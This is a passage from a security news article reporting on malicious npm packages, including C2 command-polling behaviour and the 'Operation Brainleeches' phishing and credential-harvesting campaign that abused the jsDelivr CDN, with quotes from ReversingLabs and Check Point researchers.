"Since the command fetching is performed in an endless loop, it is possible that the operator of the C2 server uploads commands only after the infected machine is determined to be interesting to the threat actor," security researcher Karlo Zanki explained.

"Alternatively, the C2 server could be performing some type of request filtering. For example, attackers may filter requests based on the IP address of the infected machine to avoid infecting targets from specific countries."

In early July 2023, ReversingLabs also exposed a batch of 13 rogue npm modules that were collectively downloaded around 1,000 times as part of a novel campaign dubbed Operation Brainleeches.

What makes the activity stand out its use of some of the packages to facilitate credential harvesting via bogus Microsoft 365 login forms launched from a JavaScript email attachment, a JavaScript file that fetches the next-stage payloads from jsDelivr, a content delivery network (CDN) for packages hosted on npm.

In other words, the published npm modules act as a supporting infrastructure for hosting files used in email phishing attacks as well as carrying out supply chain attacks directed against developers.

The latter is accomplished by implanting credential harvesting scripts in applications that inadvertently incorporate the fraudulent npm packages. The libraries were posted to npm between May 11 and June 13, 2023.

"One of the key benefits of jsDelivr is the direct file links: Instead of using npm to install the package and reference it locally, you can directly link to the file hosted on jsDelivr's CDN," Check Point, which also reported on the same campaign, said. "But \[...\] even legit services such as the jsDelivr CDN can be abused for malicious purposes."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#php